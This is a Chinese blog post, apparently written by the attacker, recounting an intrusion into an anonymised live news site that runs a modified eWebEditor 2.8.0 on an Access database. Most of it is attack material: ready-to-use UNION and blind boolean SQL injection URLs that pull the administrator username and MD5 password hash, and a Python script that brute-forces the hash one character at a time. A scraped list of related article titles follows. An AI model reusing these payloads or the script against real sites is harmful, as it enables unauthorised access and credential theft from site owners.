某网站(JSP + Access) 渗透 实例 ( eWebEditor 漏洞 )
某网站后台是用的 蓝滨新闻系统精简加强版 即如图:
可见,后台是JSP + Access,虽然这个新闻系统标题写了是安全性加强版本,但是对于这种系统我还是很感兴趣的。
根据这个系统的源代码,找这个系统的漏洞。
manage/htmledit/eWebEditor.asp
sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"oRs.Open sSql, oConn, 0,
可以看到,这里有注入。这里用的是臭名昭著的 eWebEditor 2.8.0 最终版
如果是纯粹的eWebEditor ,那么到这里 直接上工具就行了。但是这里是魔改过的,所以,传统的注入不可以。所以需要魔改SQL语句。因为数据库是Access,破解就好麻烦啦。。
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard%27%20union%20select%20sys_UserPass,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System''http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_Systemhttp://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' and ((select top 1 asc(mid(sys_UserPass,1,1)) from eWebEditor_System)>97) union select (14),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_Systemhttp://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union
select * from eWebEditor_System where ((select top 1 asc(mid(sys_UserPass,1,1)) from eWebEditor_System)>97)## 猜解出密码和用户名长度:16 根据程序可见,是纯MD5加密
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select (select (14) from eWebEditor_System where ((select top 1 len(sys_UserName) from eWebEditor_System) = 16)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System
true ;## 成功实现ASC II 表的字符匹配 ,如果报错则是不匹配
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select (select (14) from eWebEditor_System where ((select top 1 asc(sys_UserPass,1,1)) from eWebEditor_System)<97)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserPass,1,1))%20from%20eWebEditor_System)<66)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_Systemhttp://xxxx/news/manage/htmledit/eWebEditor.asp?" \"id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserName,"+str(charNum) +",1))%20from%20eWebEditor_System)<" + str(n) + ")),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System
到这里,就成功可以解出系统的用户名以及密码了。但是这里是用的ASC II 表匹配。一个一个试不现实。
写个针对性Python进行注入穷举:
kn.py
#encoding:UTF-8
import requests
##定义 n:找ASCII码
n = 48
charNum = 1
allAscII = ""
while charNum<=16:while 1:url = "http://xxxxxxx/news/news/manage/htmledit/eWebEditor.asp?" \"id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserPass,"+str(charNum) +",1))%20from%20eWebEditor_System)=" + str(n) + ")),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System"r = requests.get(url)print("访问成功,正在访问第"+ str(charNum)+"个位置的码,尝试的ASC II 码为:" + str(n) + "获取到的长度为" + str(len(r.text)))if len(r.text) > 400:print("成功获取到第"+ str(charNum)+"个位置 的 ASC II 码!为" + str(n))allAscII = allAscII + str(n) + ","break;n = n + 1charNum = charNum + 1n = 48
print(allAscII)
## 失败 长度少于400 (=317)
## 成功 长度大于400 (=12370)
## print(len(r.text))
运行:
获取了十六位的ASC II 码后,就可以根据这个表
进行转换,然后得到密码md5值
某网站(JSP + Access) 渗透 实例 ( eWebEditor 漏洞 )相关推荐
- JAVA开发运维(关于渗透测试与漏洞修复)
对于C端的网站,H5,小程序或者app都需要进行渗透测试. 渗透测试是模拟真实黑客的攻击手段,对目标网站或主机进行全面的安全评估. 与黑客攻击不同,渗透测试的目的是尽可能多地发现安全漏洞,而真正的黑客 ...
- java毕业设计——基于JSP+access的旅游管理系统设计与实现(毕业论文+程序源码)——旅游管理系统
基于JSP+access的旅游管理系统设计与实现(毕业论文+程序源码) 大家好,今天给大家介绍基于JSP+access的旅游管理系统设计与实现,文章末尾附有本毕业设计的论文和源码下载地址哦.需要下载开 ...
- 渗透分支写脚本_给小白的黑盒渗透测试作业——漏洞分析测试到安全加固建议...
概述 2016.12.22收到关于海洋网站及内网的的渗透测试项目,并对海洋CMS进行黑盒渗透测试.本次渗透测试对存在的漏洞进行了仔细的分析和测试,以了解该站点和对应的内网的安全程度,同时给出相应的安全 ...
- ewebeditor漏洞,ewebeditor漏洞攻击
ewebeditor漏洞,ewebeditor漏洞攻击 先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1.首先访问默认管理页看是否存在. 默认管理页地址 ...
- 渗透测试常见漏洞描述及修复建议
弱口令 漏洞描述 由于系统中存在有弱口令,导致攻击者通过弱口令可轻松登录系统中,从而进行下一步的攻击,如上传webshell,获取敏感数据! 另外攻击者利用弱口令登录网站管理后台,可任意增删改等操作, ...
- ewebeditor漏洞利用汇总
ewebeditor漏洞利用汇总 2007年09月24日 星期一 22:43 inurl:ewebeditor 现在eWebSoft在线编辑器用户越来越多,危害就越来越大~ 首先介绍编辑器的一些默认特 ...
- 渗透测试常见漏洞描述以及修复建议
1.Apache样例文件泄漏 漏洞描述 apache一些样例文件没有删除,可能存在cookie.session伪造,进行后台登录操作 修复建议 1.删除样例文件 2.对apache中web.xml进行 ...
- Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
漏洞名称:万户 OA OfficeServer.jsp 任意文件上传漏洞 English Name:ezOFFICE OA OfficeServer.jsp Arbitrarily File Uplo ...
- Oracle数据库与Access互导实例
Oracle数据库与Access互导实例 (1)把Access实际相关应用数据导入Oracle数据库的步骤是,首先打开Access数据库,选择你所需要导入的表,在将表名与各个列名改写为大写字母(导入O ...
最新文章
- OpenCV3.3中K-Means聚类接口简介及使用
- 设计模式(二)工厂模式
- 2019-04(2)Python学习
- Redis Windows环境安装
- 时代银通笔试20181023
- 《CCNA学习指南:Cisco网络设备互连(ICND1)(第4版)》——2.11节生产网络模拟问题2-1...
- C++中map的遍历的代码
- 一文详解当下MOS管的封装及改进
- 组态王总结之——数据库功能
- 3种常用的图片压缩方法
- 如何降低程序员的工资?
- 160603、使用pd4ml.jar和ss_css2.jar转pdf的工具类
- 【将门创投】AI 往期技术分享
- 开发手机蓝牙硬件APP如何实现蓝牙自动重连机制
- 电脑摄像头一会好使一会不好使
- 机器视觉算法工程师试题
- linux基础命令3(ps、top、ulimit、mkdir、more、cat、diff、grep、touch、cp、find、rm、split、mv、)
- Frequency Estimation Heavy Hitter under Local Differential Privacy的一些重要组件
- win10系统localhost拒绝访问的解决方法
- 组态王弹出服务器正在运行中,组态王常见问题集锦(二)